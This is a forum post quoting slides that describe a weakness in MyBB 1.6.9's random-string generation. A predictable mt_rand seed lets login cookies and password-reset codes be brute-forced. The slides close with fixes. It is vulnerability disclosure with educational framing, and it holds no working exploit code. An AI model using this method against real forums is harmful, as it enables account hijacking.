2014-02-18, 10:00 PM
Just Found This post And Is This A Problem For Me?
Quote:1. Hijacking MyBB accountsNot so random random?
2. Before we start:● The source codes are from MyBB 1.6.9● MyBB 1.6.10 is most likely vulnerable to these weaknesses too.● The presentation is for educational purpose. Im strongly against anyillegal activity. Every weakness that I find is reported to MyBBdevelopers.
3. How to access an account without a password?● Session hijack?● Steal a cookie?● Password re-set?
4. Session hijacking – Where is the session?Global.php =>inc/class_session.php :Session cant be stolen remotely, because we have a differentIP :(
5. Once again.How to access an account without a password?● Session hijack● Steal a cookie?● Password re-set?
6. Stealing a cookie >:)inc/class_session.php :So how does a cookie like this look like?From the “load_user“ function we know, that it is saved asloginkey in the DB:
7. Stealing a cookie >:)● Because of its name and nature, it might be set while login.● The login process can be found in member.php file.member.php :● So we know the first part: User ID. How about the$user[loginkey ] ?● member.php includes an interesting file calledfunctions_user.phpmember.php :
8. Stealing a cookie >:)● The loginkey is always part of $user variable (or similar).The newly discovered file could then have some moreinformation about the loginkey.inc/functions_user.php :● So the cookie looks like this: [user_id]_[string]
9. Stealing a cookie >:)● To find out more about our mysterious string, lets have alook at the random_str() function. Because this looks like aregular function, it might be in the inc/functions.php file.inc/functions.php :● The array has these characters: a-z, A-Z, 1-9
10. Stealing a cookie >:)● As you can see, the argument at random_str() is number ofcharacters in the returned string. In our case 50. So anexample string could be:1_98n6GS6F7xIyf74cI44FXIJHCfyyeEFjGyFKW678265btWzy2k – imagine brute-forcing that.
11. Stealing a cookie >:)● The characters for the random string are chosen bymy_rand() function ==>
12. Stealing a cookie >:)●
13. Stealing a cookie >:)● As you can see, the final return is counted this way:$min + (($distance + 1) * (mt_rand() ^ $obfuscator) /(mt_getrandmax() + 1))● Known variables:● $min = 0● $distance = 60mt_getrandmax() = 2147483647 (seriously, test it for yourself.32-bit and 64-bit systems give out the same number)● Updated formula:0 + ((60 + 1) * (mt_rand() ^ $obfuscator) / ( 2147483647 + 1))● And it gets better!
14. Stealing a cookie >:)● my_rand() function uses secure_seed_rng() to seed themt_rand() function that is being used for output. ==>
15. Stealing a cookie >:)
16. Stealing a cookie >:)● If PHP can read the dev/urandom file, we might have aproblem● But if the forum runs on Windows server or uses cPanel(and possibly other control panels), it might not be allowedto read this file and the seed will be counted frommicrotime() function and process ID.● microtime():● format => msec sec● example => 0.89574000 1366899417
17. Stealing a cookie >:)● Back to my_rand() function. We figured out how the seed iscomputed, but re-counting it for each character could taketime.inc/functions.php :● Because of the static variables, the seed is counted onlyonce => We need to brute-force the seed just once and thenjust re-use it.
18. Stealing a cookie >:)● However, 50 characters is still enough and we dont knowthe exact time.● So how to make this even easier?
19. Password re-set● When recovering a password, user has to enter averification code that is sent to his e-mail.● This code is generated by random_str() function.member.php :inc/functions.php :● The activation link looks like:www.example.ext/member.php?action=resetpassword&uid=[user ID]&code=[activation code]● We know the exact time of the generation, so all we have tobrute-force is the microseconds.
20. Password re-set● After using correct activation code, the random password isgenerated:member.php :MyBB registration page:● Password length will always be equal or bigger than 8● Because we know the time when it was generated, it is easyto brute-force
21. How to fix this?● Use new seed for every character in string.● Use openssl_random_pseudo_bytes() instead ofmt_rand()● Make the seed a bit longer or random lengths